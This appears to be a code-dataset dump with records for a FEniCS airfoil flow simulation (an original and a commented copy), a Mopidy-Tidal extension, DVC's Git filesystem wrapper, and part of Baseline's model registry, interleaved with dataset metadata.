Point( 0.383767, -0.018677 ),
Point( 0.421506, -0.017200 ),
Point( 0.460025, -0.015646 ),
Point( 0.498824, -0.014038 ),
Point( 0.537674, -0.012432 ),
Point( 0.576342, -0.010875 ),
Point( 0.614595, -0.009404 ),
Point( 0.652198, -0.008049 ),
Point( 0.688920, -0.006829 ),
Point( 0.724534, -0.005754 ),
Point( 0.758815, -0.004826 ),
Point( 0.791547, -0.004042 ),
Point( 0.822520, -0.003392 ),
Point( 0.851537, -0.002863 ),
Point( 0.878408, -0.002440 ),
Point( 0.902958, -0.002109 ),
Point( 0.925025, -0.001853 ),
Point( 0.944461, -0.001659 ),
Point( 0.961137, -0.001514 ),
Point( 0.974939, -0.001409 ),
Point( 0.985774, -0.001335 ),
Point( 0.993567, -0.001286 ),
Point( 0.998264, -0.001258 ),
Point( 0.999833, -0.001249 ),
Point( 1 , 0 )]
blade = mshr.Polygon(domain_vertices);
domain = channel - blade
mesh = mshr.generate_mesh(domain, 50)
class InitialCondition(UserExpression):
    """Zero initial state for the mixed (velocity, pressure) field."""
    def eval(self, values, x):
        values[0] = 0.0  # velocity x-component
        values[1] = 0.0  # velocity y-component
        values[2] = 0.0  # pressure
    def value_shape(self):
        # Mixed space: 2 velocity components + 1 pressure.
        return (3,)
ic=InitialCondition(degree = 2)
class Boundary_NACA(SubDomain):
    """Marks boundary facets lying inside the bounding box of the airfoil blade."""
    def inside(self, x, on_boundary):
        # The blade polygon spans roughly [0, 1] x [-0.03, 0.10]; a slightly
        # larger box is used so every facet on the blade surface is caught.
        # (Removed the unused local `tol` from the original.)
        return on_boundary and x[0] > -0.05 and x[0] < 1.05 and x[1] > -0.1 and x[1] < 0.1
boundary_N = Boundary_NACA()
domainBoundaries = MeshFunction("size_t", mesh, mesh.topology().dim() - 1)
domainBoundaries.set_all(0)
ds = Measure("ds")[domainBoundaries]
nor = 3
for i in range(nor):
edge_markers = MeshFunction("bool", mesh, mesh.topology().dim() - 1, False)
boundary_N.mark(edge_markers, True)
mesh = refine(mesh, edge_markers)
# Define function spaces
V = VectorElement("CG",mesh.ufl_cell(), 2)
P = FiniteElement("CG",mesh.ufl_cell(), 1)
VP = MixedElement([V, P])
W = FunctionSpace(mesh,VP)
# Define unknown and test function(s)
w = Function(W)
w0 = Function(W)
(v_, p_) = TestFunctions(W)
(v,p)=split(w)
(v0,p0)=split(w0)
bcs = list()
bcs.append( DirichletBC(W.sub(0), Constant((1.0, 0.0)), "near(x[0],-1.0)") )
bcs.append( DirichletBC(W.sub(0), Constant((1.0, 0.0)), "near(x[1],-0.5) || near(x[1],0.5)") )
bcs.append( DirichletBC(W.sub(1), Constant(0.0), "near(x[0],2.0)") )
bcs.append( DirichletBC(W.sub(0), Constant((0.0, 0.0)), "x[0]>-0.05 && x[0]<1.05 && x[1]>-0.1 && x[1]<0.1 && on_boundary") )
rho=1e1
mu=1e-3
def sigma(v,p):
    """Cauchy stress tensor of an incompressible Newtonian fluid: -p*I + mu*(grad v + grad v^T)."""
    # NOTE(review): relies on the module-level globals I (identity tensor) and mu (viscosity).
    return(-p*I + mu*(grad(v)+grad(v).T))
def EQ(v,p,v_,p_):
    """Weak form of the momentum equation: convection - gravity forcing + stress term."""
    # rho and g are module-level constants; sigma(v, p) is the stress tensor above.
    F = rho*inner(grad(v)*v, v_)*dx - rho*inner(g,v_)*dx + inner(sigma(v,p),grad(v_))*dx
    return(F)
n = FacetNormal(mesh)
I = Identity(V.cell().geometric_dimension()) # Identity tensor
h = CellDiameter(mesh)
F=k*0.5*(theta*rho)*inner(v-v0,v_)*dx + theta*EQ(v,p,v_,p_) + (Constant(1.0)-theta)*EQ(v0,p,v_,p_) + div(v)*p_*dx
J = derivative(F, w)
#ffc_options = {"quadrature_degree": 4, "optimize": True, "eliminate_zeros": False}
ffc_options = {"quadrature_degree": 4, "optimize": True}
problem=NonlinearVariationalProblem(F,w,bcs,J,ffc_options)
solver=NonlinearVariationalSolver(problem)
prm = solver.parameters
prm['nonlinear_solver'] = 'newton'
prm['newton_solver']['linear_solver'] = 'umfpack'
prm['newton_solver']['lu_solver']['report'] = False
prm['newton_solver']['lu_solver']['same_nonzero_pattern']=True
prm['newton_solver']['absolute_tolerance'] = 1E-8
prm['newton_solver']['relative_tolerance'] = 1E-8
prm['newton_solver']['maximum_iterations'] = 30
prm['newton_solver']['report'] = True
#prm['newton_solver']['error_on_nonconvergence'] = False
w.assign(interpolate(ic,W))
w0.assign(interpolate(ic,W))
(v,p) = w.split()
(v0,p0) = w0.split()
# Create files for storing solution
vfile = File("%s.results/velocity.pvd" % (fileName))
pfile = File("%s.results/pressure.pvd" % (fileName))
v.rename("v", "velocity") ; vfile << v
p.rename("p", "pressure") ; pfile << p
# Time-stepping: theta-scheme march from t = dt to t_end, writing each step.
t = dt
while t < t_end:
    # BUG FIX: the original `print("t =%d", t)` passed the format string and
    # the float as two separate arguments, printing the literal "%d".
    print("t = %g" % t)
    begin("Solving transport...")
    solver.solve()
    end()
    (v, p) = w.split(True)
    v.rename("v", "velocity"); vfile << v
    p.rename("p", "pressure"); pfile << p
    w0.assign(w)  # current solution becomes the previous-step value
    t += dt  # advance to the next time level
# Report drag and lift
force = dot(sigma(v,p), n)
D = (force[0]/0.002)*ds(5)
L = (force[1]/0.002)*ds(5)
#drag = assemble(D)
#lift = assemble(L)
#info("drag= %e lift= %e" % (drag , lift))
|
<filename>NACA.py
##http://airfoiltools.com/airfoil/naca4digit
from dolfin import *
import ufl
import time
import os
import mshr
# get file name
fileName = os.path.splitext(__file__)[0]
parameters["form_compiler"]["cpp_optimize"] = True
parameters["form_compiler"]["quadrature_degree"] = 8
#parameters["form_compiler"]["quadrature_rule"] = 'auto'
comm = mpi_comm_world()
rank = MPI.rank(comm)
set_log_level(INFO if rank==0 else INFO+1)
ufl.set_level(ufl.INFO if rank==0 else ufl.INFO+1)
parameters["std_out_all_processes"] = False;
info_blue(dolfin.__version__)
# Time stepping parameters
dt = 0.01
t_end = 1.0
theta=Constant(0.5) # theta schema
k=Constant(1.0/dt)
g=Constant((0.0,-1.0))
## Create mesh
channel = mshr.Rectangle(Point(-1.0, -0.5),Point(2, 0.5))
# Create list of polygonal domain vertices for the car
domain_vertices = [Point(1, 0 ),
Point( 1.000167, 0.001249 ),
Point( 0.998653, 0.001668 ),
Point( 0.994122, 0.002919 ),
Point( 0.986596, 0.004976 ),
Point( 0.976117, 0.007801 ),
Point( 0.962742, 0.011341 ),
Point( 0.946545, 0.015531 ),
Point( 0.927615, 0.020294 ),
Point( 0.906059, 0.025547 ),
Point( 0.881998, 0.031197 ),
Point( 0.855570, 0.037149 ),
Point( 0.826928, 0.043305 ),
Point( 0.796239, 0.049564 ),
Point( 0.763684, 0.055826 ),
Point( 0.729457, 0.061992 ),
Point( 0.693763, 0.067967 ),
Point( 0.656819, 0.073655 ),
Point( 0.618851, 0.078967 ),
Point( 0.580092, 0.083817 ),
Point( 0.540785, 0.088125 ),
Point( 0.501176, 0.091816 ),
Point( 0.461516, 0.094825 ),
Point( 0.422059, 0.097095 ),
Point( 0.382787, 0.098537 ),
Point( 0.343868, 0.098810 ),
Point( 0.305921, 0.097852 ),
Point( 0.269212, 0.095696 ),
Point( 0.234002, 0.092400 ),
Point( 0.200538, 0.088046 ),
Point( 0.169056, 0.082736 ),
Point( 0.139770, 0.076589 ),
Point( 0.112880, 0.069743 ),
Point( 0.088560, 0.062343 ),
Point( 0.066964, 0.054540 ),
Point( 0.048221, 0.046485 ),
Point( 0.032437, 0.038325 ),
Point( 0.019693, 0.030193 ),
Point( 0.010051, 0.022209 ),
Point( 0.003547, 0.014471 ),
Point( 0.000198, 0.007052 ),
Point( 0.000000, 0.000000 ),
Point( 0.002885, -0.006437 ),
Point( 0.008765, -0.012027 ),
Point( 0.017579, -0.016779 ),
Point( 0.029250, -0.020704 ),
Point( 0.043684, -0.023825 ),
Point( 0.060773, -0.026172 ),
Point( 0.080396, -0.027782 ),
Point( 0.102423, -0.028706 ),
Point( 0.126714, -0.029000 ),
Point( 0.153123, -0.028734 ),
Point( 0.181496, -0.027986 ),
Point( 0.211676, -0.026843 ),
Point( 0.243500, -0.025401 ),
Point( 0.276797, -0.023760 ),
Point( 0.311396, -0.022023 ),
Point( 0.347115, -0.020295 ),
Point( 0.383767, -0.018677 ),
Point( 0.421506, -0.017200 ),
Point( 0.460025, -0.015646 ),
Point( 0.498824, -0.014038 ),
Point( 0.537674, -0.012432 ),
Point( 0.576342, -0.010875 ),
Point( 0.614595, -0.009404 ),
Point( 0.652198, -0.008049 ),
Point( 0.688920, -0.006829 ),
Point( 0.724534, -0.005754 ),
Point( 0.758815, -0.004826 ),
Point( 0.791547, -0.004042 ),
Point( 0.822520, -0.003392 ),
Point( 0.851537, -0.002863 ),
Point( 0.878408, -0.002440 ),
Point( 0.902958, -0.002109 ),
Point( 0.925025, -0.001853 ),
Point( 0.944461, -0.001659 ),
Point( 0.961137, -0.001514 ),
Point( 0.974939, -0.001409 ),
Point( 0.985774, -0.001335 ),
Point( 0.993567, -0.001286 ),
Point( 0.998264, -0.001258 ),
Point( 0.999833, -0.001249 ),
Point( 1 , 0 )]
blade = mshr.Polygon(domain_vertices);
domain = channel - blade
mesh = mshr.generate_mesh(domain, 50)
class InitialCondition(UserExpression):
def eval(self, values, x):
values[0] = 0.0
values[1] = 0.0
values[2] = 0.0
def value_shape(self):
return (3,)
ic=InitialCondition(degree = 2)
class Boundary_NACA(SubDomain):
def inside(self, x, on_boundary):
tol = 1E-14
return on_boundary and x[0]>-0.05 and x[0]<1.05 and x[1]>-0.1 and x[1]<0.1
boundary_N = Boundary_NACA()
domainBoundaries = MeshFunction("size_t", mesh, mesh.topology().dim() - 1)
domainBoundaries.set_all(0)
ds = Measure("ds")[domainBoundaries]
nor = 3
for i in range(nor):
edge_markers = MeshFunction("bool", mesh, mesh.topology().dim() - 1, False)
boundary_N.mark(edge_markers, True)
mesh = refine(mesh, edge_markers)
# Define function spaces
V = VectorElement("CG",mesh.ufl_cell(), 2)
P = FiniteElement("CG",mesh.ufl_cell(), 1)
VP = MixedElement([V, P])
W = FunctionSpace(mesh,VP)
# Define unknown and test function(s)
w = Function(W)
w0 = Function(W)
(v_, p_) = TestFunctions(W)
(v,p)=split(w)
(v0,p0)=split(w0)
bcs = list()
bcs.append( DirichletBC(W.sub(0), Constant((1.0, 0.0)), "near(x[0],-1.0)") )
bcs.append( DirichletBC(W.sub(0), Constant((1.0, 0.0)), "near(x[1],-0.5) || near(x[1],0.5)") )
bcs.append( DirichletBC(W.sub(1), Constant(0.0), "near(x[0],2.0)") )
bcs.append( DirichletBC(W.sub(0), Constant((0.0, 0.0)), "x[0]>-0.05 && x[0]<1.05 && x[1]>-0.1 && x[1]<0.1 && on_boundary") )
rho=1e1
mu=1e-3
def sigma(v,p):
return(-p*I + mu*(grad(v)+grad(v).T))
def EQ(v,p,v_,p_):
F = rho*inner(grad(v)*v, v_)*dx - rho*inner(g,v_)*dx + inner(sigma(v,p),grad(v_))*dx
return(F)
n = FacetNormal(mesh)
I = Identity(V.cell().geometric_dimension()) # Identity tensor
h = CellDiameter(mesh)
F=k*0.5*(theta*rho)*inner(v-v0,v_)*dx + theta*EQ(v,p,v_,p_) + (Constant(1.0)-theta)*EQ(v0,p,v_,p_) + div(v)*p_*dx
J = derivative(F, w)
#ffc_options = {"quadrature_degree": 4, "optimize": True, "eliminate_zeros": False}
ffc_options = {"quadrature_degree": 4, "optimize": True}
problem=NonlinearVariationalProblem(F,w,bcs,J,ffc_options)
solver=NonlinearVariationalSolver(problem)
prm = solver.parameters
prm['nonlinear_solver'] = 'newton'
prm['newton_solver']['linear_solver'] = 'umfpack'
prm['newton_solver']['lu_solver']['report'] = False
prm['newton_solver']['lu_solver']['same_nonzero_pattern']=True
prm['newton_solver']['absolute_tolerance'] = 1E-8
prm['newton_solver']['relative_tolerance'] = 1E-8
prm['newton_solver']['maximum_iterations'] = 30
prm['newton_solver']['report'] = True
#prm['newton_solver']['error_on_nonconvergence'] = False
w.assign(interpolate(ic,W))
w0.assign(interpolate(ic,W))
(v,p) = w.split()
(v0,p0) = w0.split()
# Create files for storing solution
vfile = File("%s.results/velocity.pvd" % (fileName))
pfile = File("%s.results/pressure.pvd" % (fileName))
v.rename("v", "velocity") ; vfile << v
p.rename("p", "pressure") ; pfile << p
# Time-stepping
t = dt
while t < t_end:
print("t =%d", t)
begin("Solving transport...")
solver.solve()
end()
(v,p)=w.split(True)
v.rename("v", "velocity") ; vfile << v
p.rename("p", "pressure") ; pfile << p
w0.assign(w)
t += dt # t:=t+1
# Report drag and lift
force = dot(sigma(v,p), n)
D = (force[0]/0.002)*ds(5)
L = (force[1]/0.002)*ds(5)
#drag = assemble(D)
#lift = assemble(L)
#info("drag= %e lift= %e" % (drag , lift))
|
en
| 0.363331
|
##http://airfoiltools.com/airfoil/naca4digit # get file name #parameters["form_compiler"]["quadrature_rule"] = 'auto' # Time stepping parameters # theta schema ## Create mesh # Create list of polygonal domain vertices for the car # Define function spaces # Define unknown and test function(s) # Identity tensor #ffc_options = {"quadrature_degree": 4, "optimize": True, "eliminate_zeros": False} #prm['newton_solver']['error_on_nonconvergence'] = False # Create files for storing solution # Time-stepping # t:=t+1 # Report drag and lift #drag = assemble(D) #lift = assemble(L) #info("drag= %e lift= %e" % (drag , lift))
| 2.054391
| 2
|
mopidy_tidal/__init__.py
|
mones88/mopidy-tidal
| 30
|
6627599
|
from __future__ import unicode_literals
import logging
import os
import sys
from mopidy import config, ext
__version__ = '0.2.7'
# TODO: If you need to log, use loggers named after the current Python module
logger = logging.getLogger(__name__)
file_dir = os.path.dirname(__file__)
sys.path.append(file_dir)
class Extension(ext.Extension):
    """Mopidy extension wiring for the Tidal backend."""

    dist_name = 'Mopidy-Tidal'
    ext_name = 'tidal'
    version = __version__

    def get_default_config(self):
        # Ship the bundled ext.conf sitting next to this module as the defaults.
        return config.read(os.path.join(os.path.dirname(__file__), 'ext.conf'))

    def get_config_schema(self):
        schema = super(Extension, self).get_config_schema()
        schema['quality'] = config.String(choices=["LOSSLESS", "HIGH", "LOW"])
        schema['client_id'] = config.String(optional=True)
        schema['client_secret'] = config.String(optional=True)
        return schema

    def setup(self, registry):
        # Import lazily so the backend's dependencies load only when enabled.
        from .backend import TidalBackend
        registry.add('backend', TidalBackend)
|
from __future__ import unicode_literals
import logging
import os
import sys
from mopidy import config, ext
__version__ = '0.2.7'
# TODO: If you need to log, use loggers named after the current Python module
logger = logging.getLogger(__name__)
file_dir = os.path.dirname(__file__)
sys.path.append(file_dir)
class Extension(ext.Extension):
dist_name = 'Mopidy-Tidal'
ext_name = 'tidal'
version = __version__
def get_default_config(self):
conf_file = os.path.join(os.path.dirname(__file__), 'ext.conf')
return config.read(conf_file)
def get_config_schema(self):
schema = super(Extension, self).get_config_schema()
schema['quality'] = config.String(choices=["LOSSLESS", "HIGH", "LOW"])
schema['client_id'] = config.String(optional=True)
schema['client_secret'] = config.String(optional=True)
return schema
def setup(self, registry):
from .backend import TidalBackend
registry.add('backend', TidalBackend)
|
en
| 0.689266
|
# TODO: If you need to log, use loggers named after the current Python module
| 2.128798
| 2
|
dvc/fs/git.py
|
PietrassykFP/dvc
| 1
|
6627600
|
import os
import threading
from typing import TYPE_CHECKING, Any, Callable
from funcy import cached_property, wrap_prop
from .fsspec_wrapper import AnyFSPath, FSSpecWrapper
if TYPE_CHECKING:
from scmrepo.fs import GitFileSystem as FsspecGitFileSystem
from scmrepo.git import Git
from scmrepo.git.objects import GitTrie
class GitFileSystem(FSSpecWrapper):  # pylint:disable=abstract-method
    """Proxies the repo file access methods to Git objects.

    Thin delegation layer: all real work is done by scmrepo's
    GitFileSystem, constructed lazily from the stored ``fs_args``.
    """
    sep = os.sep
    scheme = "local"

    def __init__(
        self,
        path: str = None,
        rev: str = None,
        scm: "Git" = None,
        trie: "GitTrie" = None,
        **kwargs: Any,
    ) -> None:
        # Only record the constructor arguments here; the underlying fsspec
        # filesystem is built lazily in the `fs` cached property below.
        from dvc.scm import resolve_rev
        super().__init__()
        self.fs_args.update(
            {
                "path": path,
                "rev": rev,
                "scm": scm,
                "trie": trie,
                "rev_resolver": resolve_rev,
                **kwargs,
            }
        )

    @wrap_prop(threading.Lock())
    @cached_property
    def fs(self) -> "FsspecGitFileSystem":
        # Lock-guarded lazy construction of the scmrepo filesystem.
        from scmrepo.fs import GitFileSystem as FsspecGitFileSystem
        return FsspecGitFileSystem(**self.fs_args)

    @property
    def rev(self) -> str:
        # Revision reported by the underlying filesystem.
        return self.fs.rev

    def isfile(self, path: AnyFSPath) -> bool:
        return self.fs.isfile(path)

    def walk(
        self,
        top: AnyFSPath,
        topdown: bool = True,
        onerror: Callable[[OSError], None] = None,
        **kwargs: Any,
    ):
        # Delegate directly to the underlying fsspec implementation.
        return self.fs.walk(top, topdown=topdown, onerror=onerror, **kwargs)
|
import os
import threading
from typing import TYPE_CHECKING, Any, Callable
from funcy import cached_property, wrap_prop
from .fsspec_wrapper import AnyFSPath, FSSpecWrapper
if TYPE_CHECKING:
from scmrepo.fs import GitFileSystem as FsspecGitFileSystem
from scmrepo.git import Git
from scmrepo.git.objects import GitTrie
class GitFileSystem(FSSpecWrapper): # pylint:disable=abstract-method
"""Proxies the repo file access methods to Git objects"""
sep = os.sep
scheme = "local"
def __init__(
self,
path: str = None,
rev: str = None,
scm: "Git" = None,
trie: "GitTrie" = None,
**kwargs: Any,
) -> None:
from dvc.scm import resolve_rev
super().__init__()
self.fs_args.update(
{
"path": path,
"rev": rev,
"scm": scm,
"trie": trie,
"rev_resolver": resolve_rev,
**kwargs,
}
)
@wrap_prop(threading.Lock())
@cached_property
def fs(self) -> "FsspecGitFileSystem":
from scmrepo.fs import GitFileSystem as FsspecGitFileSystem
return FsspecGitFileSystem(**self.fs_args)
@property
def rev(self) -> str:
return self.fs.rev
def isfile(self, path: AnyFSPath) -> bool:
return self.fs.isfile(path)
def walk(
self,
top: AnyFSPath,
topdown: bool = True,
onerror: Callable[[OSError], None] = None,
**kwargs: Any,
):
return self.fs.walk(top, topdown=topdown, onerror=onerror, **kwargs)
|
en
| 0.663718
|
# pylint:disable=abstract-method Proxies the repo file access methods to Git objects
| 2.163122
| 2
|
python/baseline/model.py
|
domyounglee/baseline
| 0
|
6627601
|
<filename>python/baseline/model.py
import logging
import numpy as np
from baseline.utils import (
export, optional_params, listify, register, import_user_module, read_json
)
__all__ = []
exporter = export(__all__)
logger = logging.getLogger('baseline')
BASELINE_MODELS = {}
BASELINE_LOADERS = {}
@exporter
@optional_params
def register_model(cls, task, name=None):
    """Register a function as a plug-in"""
    if name is None:
        name = cls.__name__
    aliases = listify(name)

    # Ensure both registries have a slot for this task.
    BASELINE_MODELS.setdefault(task, {})
    BASELINE_LOADERS.setdefault(task, {})

    # Prefer an explicit `create` classmethod; fall back to the constructor.
    if hasattr(cls, 'create'):
        def create(*args, **kwargs):
            return cls.create(*args, **kwargs)
    else:
        def create(*args, **kwargs):
            return cls(*args, **kwargs)

    for alias in aliases:
        if alias in BASELINE_MODELS[task]:
            raise Exception('Error: attempt to re-define previously registered handler {} (old: {}, new: {}) for task {} in registry'.format(alias, BASELINE_MODELS[task], cls, task))
        BASELINE_MODELS[task][alias] = create
        if hasattr(cls, 'load'):
            BASELINE_LOADERS[task][alias] = cls.load
    return cls
@exporter
def create_model_for(activity, input_, output_, **kwargs):
    """Instantiate a registered model for `activity` (e.g. 'classify')."""
    model_type = kwargs.get('type', kwargs.get('model_type', 'default'))
    creator_fn = BASELINE_MODELS[activity][model_type]
    logger.info('Calling model %s', creator_fn)
    if output_ is None:
        return creator_fn(input_, **kwargs)
    return creator_fn(input_, output_, **kwargs)


@exporter
def create_model(embeddings, labels, **kwargs):
    """Create a text-classification model."""
    return create_model_for('classify', embeddings, labels, **kwargs)


@exporter
def create_tagger_model(embeddings, labels, **kwargs):
    """Create a sequence-tagging model."""
    return create_model_for('tagger', embeddings, labels, **kwargs)
BASELINE_SEQ2SEQ_ENCODERS = {}


@exporter
@optional_params
def register_encoder(cls, name=None):
    """Register a function as a plug-in"""
    return register(cls, BASELINE_SEQ2SEQ_ENCODERS, name, 'encoder')


BASELINE_SEQ2SEQ_DECODERS = {}


@exporter
@optional_params
def register_decoder(cls, name=None):
    """Register a function as a plug-in"""
    return register(cls, BASELINE_SEQ2SEQ_DECODERS, name, 'decoder')


BASELINE_SEQ2SEQ_ARC_POLICY = {}


@exporter
@optional_params
def register_arc_policy(cls, name=None):
    """Register a function as a plug-in"""
    # BUG FIX: the label was copy-pasted as 'decoder'; it should name the
    # arc-policy registry this call actually targets (the label is
    # presumably only used in registration diagnostics — verify in
    # baseline.utils.register).
    return register(cls, BASELINE_SEQ2SEQ_ARC_POLICY, name, 'arc policy')


@exporter
def create_seq2seq_decoder(tgt_embeddings, **kwargs):
    """Look up and build a seq2seq decoder (default type: 'default')."""
    decoder_type = kwargs.get('decoder_type', 'default')
    Constructor = BASELINE_SEQ2SEQ_DECODERS.get(decoder_type)
    return Constructor(tgt_embeddings, **kwargs)


@exporter
def create_seq2seq_encoder(**kwargs):
    """Look up and build a seq2seq encoder (default type: 'default')."""
    encoder_type = kwargs.get('encoder_type', 'default')
    Constructor = BASELINE_SEQ2SEQ_ENCODERS.get(encoder_type)
    return Constructor(**kwargs)


@exporter
def create_seq2seq_arc_policy(**kwargs):
    """Look up and build an arc policy (default type: 'default')."""
    arc_type = kwargs.get('arc_policy_type', 'default')
    Constructor = BASELINE_SEQ2SEQ_ARC_POLICY.get(arc_type)
    return Constructor()
@exporter
def create_seq2seq_model(embeddings, labels, **kwargs):
    """Create an encoder-decoder (seq2seq) model from the registry."""
    return create_model_for('seq2seq', embeddings, labels, **kwargs)


@exporter
def create_lang_model(embeddings, **kwargs):
    """Create a language model; LMs have no label output, hence output_=None."""
    return create_model_for('lm', embeddings, None, **kwargs)
@exporter
def load_model_for(activity, filename, **kwargs):
    """Reload a saved model for `activity` from `filename` via its registered loader."""
    # Sniff state to see if we need to import things
    state = read_json('{}.state'.format(filename))
    # There won't be a module for pytorch (there is no state file to load).
    if 'module' in state:
        import_user_module(state['module'])
    # Allow user to override model type (for back compat with old api), backoff
    # to the model type in the state file or to default.
    # TODO: Currently in pytorch all models are always reloaded with the load
    # classmethod with a default model class. This is fine given how simple pyt
    # loading is but it could cause problems if a model has a custom load
    model_type = kwargs.get('type', kwargs.get('model_type', state.get('type', state.get('model_type', 'default'))))
    creator_fn = BASELINE_LOADERS[activity][model_type]
    logger.info('Calling model %s', creator_fn)
    return creator_fn(filename, **kwargs)
@exporter
def load_model(filename, **kwargs):
    """Reload a saved classifier model."""
    return load_model_for('classify', filename, **kwargs)


@exporter
def load_tagger_model(filename, **kwargs):
    """Reload a saved tagger model."""
    return load_model_for('tagger', filename, **kwargs)


@exporter
def load_seq2seq_model(filename, **kwargs):
    """Reload a saved encoder-decoder model."""
    return load_model_for('seq2seq', filename, **kwargs)


@exporter
def load_lang_model(filename, **kwargs):
    """Reload a saved language model."""
    return load_model_for('lm', filename, **kwargs)
@exporter
class ClassifierModel(object):
    """Text classifier

    Provide an interface to DNN classifiers that use word lookup tables.

    This is an abstract interface: framework backends register concrete
    subclasses via `register_model` and implement the methods below.
    """
    task_name = 'classify'

    def __init__(self):
        super(ClassifierModel, self).__init__()

    def save(self, basename):
        """Save this model out

        :param basename: Name of the model, not including suffixes
        :return: None
        """
        pass

    @classmethod
    def load(cls, basename, **kwargs):
        """Load the model from a basename, including directory

        :param basename: Name of the model, not including suffixes
        :param kwargs: Anything that is useful to optimize experience for a specific framework
        :return: A newly created model
        """
        pass

    def predict(self, batch_dict):
        """Classify a batch of text with whatever features the model can use from the batch_dict.
        The indices correspond to get_vocab().get('word', 0)

        :param batch_dict: This normally contains `x`, a `BxT` tensor of indices. Some classifiers and readers may
        provide other features

        :return: A list of lists of tuples (label, value)
        """
        pass

    # deprecated: use predict
    def classify(self, batch_dict):
        """Deprecated alias for :meth:`predict`; logs a warning and delegates."""
        logger.warning('`classify` is deprecated, use `predict` instead.')
        return self.predict(batch_dict)

    def get_labels(self):
        """Return a list of labels, where the offset within the list is the location in a confusion matrix, etc.

        :return: A list of the labels for the decision
        """
        pass
@exporter
class TaggerModel(object):
    """Structured prediction classifier, AKA a tagger

    This class takes a temporal signal, represented as words over time, and characters of words
    and generates an output label for each time.  This type of model is used for POS tagging or any
    type of chunking (e.g. NER, POS chunks, slot-filling)

    Abstract interface: concrete framework backends implement the methods below.
    """
    task_name = 'tagger'

    def __init__(self):
        super(TaggerModel, self).__init__()

    def save(self, basename):
        """Persist the model under `basename` (no suffix)."""
        pass

    @staticmethod
    def load(basename, **kwargs):
        """Reload a saved tagger from `basename`."""
        pass

    def predict(self, batch_dict):
        """Tag a batch of sequences; returns per-timestep labels."""
        pass

    def get_labels(self):
        """Return the ordered list of output labels."""
        pass
@exporter
class LanguageModel(object):
    """Abstract interface for language models; backends register concrete subclasses."""
    task_name = 'lm'

    def __init__(self):
        super(LanguageModel, self).__init__()

    @staticmethod
    def load(basename, **kwargs):
        """Reload a saved language model from `basename`."""
        pass

    @classmethod
    def create(cls, embeddings, **kwargs):
        """Build a new language model over the given embeddings."""
        pass

    def predict(self, batch_dict, **kwargs):
        """Score/generate next-token distributions for a batch."""
        pass
@exporter
class EncoderDecoderModel(object):
    """Abstract interface for sequence-to-sequence (encoder-decoder) models."""
    task_name = 'seq2seq'

    def save(self, model_base):
        """Persist the model under `model_base` (no suffix)."""
        pass

    def __init__(self, *args, **kwargs):
        super(EncoderDecoderModel, self).__init__()

    @staticmethod
    def load(basename, **kwargs):
        """Reload a saved seq2seq model from `basename`."""
        pass

    @classmethod
    def create(cls, src_embeddings, dst_embedding, **kwargs):
        """Build a new model from source and destination embeddings."""
        pass

    def create_loss(self):
        """Construct the training loss for this model."""
        pass

    def predict(self, source_dict, **kwargs):
        """Decode output sequences for a batch of source inputs."""
        pass

    # deprecated: use predict
    def run(self, source_dict, **kwargs):
        """Deprecated alias for :meth:`predict`; logs a warning and delegates."""
        logger.warning('`run` is deprecated, use `predict` instead.')
        return self.predict(source_dict, **kwargs)
|
<filename>python/baseline/model.py
import logging
import numpy as np
from baseline.utils import (
export, optional_params, listify, register, import_user_module, read_json
)
__all__ = []
exporter = export(__all__)
logger = logging.getLogger('baseline')
BASELINE_MODELS = {}
BASELINE_LOADERS = {}
@exporter
@optional_params
def register_model(cls, task, name=None):
    """Register a model class as a plug-in for *task*.

    :param cls: the model class; its ``create`` classmethod (or the class
        itself) becomes the creator, and its ``load`` method the loader
    :param task: task registry key (e.g. 'classify', 'tagger')
    :param name: alias or list of aliases; defaults to the class name
    :return: *cls*, unchanged, so this works as a decorator
    :raises Exception: if an alias is already registered for the task
    """
    if name is None:
        name = cls.__name__
    names = listify(name)
    if task not in BASELINE_MODELS:
        BASELINE_MODELS[task] = {}
    if task not in BASELINE_LOADERS:
        BASELINE_LOADERS[task] = {}
    # Prefer an explicit factory classmethod when the class provides one.
    if hasattr(cls, 'create'):
        def create(*args, **kwargs):
            return cls.create(*args, **kwargs)
    else:
        def create(*args, **kwargs):
            return cls(*args, **kwargs)
    for alias in names:
        if alias in BASELINE_MODELS[task]:
            # Fixed: report the clashing entry, not the whole task registry.
            raise Exception('Error: attempt to re-define previously registered handler {} (old: {}, new: {}) for task {} in registry'.format(alias, BASELINE_MODELS[task][alias], cls, task))
        BASELINE_MODELS[task][alias] = create
        if hasattr(cls, 'load'):
            BASELINE_LOADERS[task][alias] = cls.load
    return cls
@exporter
def create_model_for(activity, input_, output_, **kwargs):
    """Instantiate the registered model for *activity*.

    The model type is taken from kwargs 'type' or 'model_type' (default
    'default'); *output_* is forwarded only when it is not None.
    """
    mtype = kwargs.get('type', kwargs.get('model_type', 'default'))
    creator = BASELINE_MODELS[activity][mtype]
    logger.info('Calling model %s', creator)
    args = (input_,) if output_ is None else (input_, output_)
    return creator(*args, **kwargs)
@exporter
def create_model(embeddings, labels, **kwargs):
    """Create a classifier model; thin wrapper over :func:`create_model_for`."""
    return create_model_for('classify', embeddings, labels, **kwargs)
@exporter
def create_tagger_model(embeddings, labels, **kwargs):
    """Create a tagger model; thin wrapper over :func:`create_model_for`."""
    return create_model_for('tagger', embeddings, labels, **kwargs)
# Registry of seq2seq encoder plug-ins, keyed by name.
BASELINE_SEQ2SEQ_ENCODERS = {}
@exporter
@optional_params
def register_encoder(cls, name=None):
    """Register a seq2seq encoder class as a plug-in"""
    return register(cls, BASELINE_SEQ2SEQ_ENCODERS, name, 'encoder')
# Registry of seq2seq decoder plug-ins, keyed by name.
BASELINE_SEQ2SEQ_DECODERS = {}
@exporter
@optional_params
def register_decoder(cls, name=None):
    """Register a seq2seq decoder class as a plug-in"""
    return register(cls, BASELINE_SEQ2SEQ_DECODERS, name, 'decoder')
# Registry of seq2seq arc-policy plug-ins, keyed by name.
BASELINE_SEQ2SEQ_ARC_POLICY = {}
@exporter
@optional_params
def register_arc_policy(cls, name=None):
    """Register a seq2seq arc-policy class as a plug-in.

    Fixed: the human-readable label passed to ``register`` was 'decoder'
    (copy-paste from register_decoder), which made duplicate-registration
    errors for arc policies report the wrong plug-in kind.
    """
    return register(cls, BASELINE_SEQ2SEQ_ARC_POLICY, name, 'arc policy')
@exporter
def create_seq2seq_decoder(tgt_embeddings, **kwargs):
    """Instantiate the registered seq2seq decoder ('decoder_type', default 'default')."""
    ctor = BASELINE_SEQ2SEQ_DECODERS.get(kwargs.get('decoder_type', 'default'))
    return ctor(tgt_embeddings, **kwargs)
@exporter
def create_seq2seq_encoder(**kwargs):
    """Instantiate the registered seq2seq encoder ('encoder_type', default 'default')."""
